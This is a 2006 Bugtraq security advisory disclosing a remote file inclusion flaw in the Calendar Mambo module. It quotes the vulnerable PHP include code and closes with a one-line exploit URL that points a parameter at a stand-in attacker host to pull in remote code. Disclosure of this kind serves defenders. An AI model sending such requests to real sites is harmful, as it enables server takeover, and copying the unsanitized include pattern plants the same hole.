[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060717064055.8534.qmail@securityfocus.com>
Date: 17 Jul 2006 06:40:55 -0000
From: matdhule@...il.com
To: bugtraq@...urityfocus.com
Subject: Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------
Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------
Author : Matdhule
Contact : matdhule@...il.com
Web : http://www.solpotcrew.org/adv/matdhule-adv-calendar.txt
Application : Calendar Module (com_calendar.php)
Version : 1.5.7 and prior
---------------------------------------------------------------------------------
Vulnerability:
In folder components we found vulnerability script com_calendar.php.
-----------------------com_calendar.php---------------------------------
<?php
//Configuration
include($absolute_path.'/components/calendar/cal_config.php');
if (!file_exists("language/calendar/".$lang."_calendar.php") ) {
die("Invalid Language");
} else {
include($absolute_path.'/language/calendar/'.$lang.'_calendar.php');
}
-------------------------------------------------------------------------
Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
---------------------------------------------------------------------------------
Exploit :
http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt?
---------------------------------------------------------------------------------
Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet
Powered by blists - more mailing lists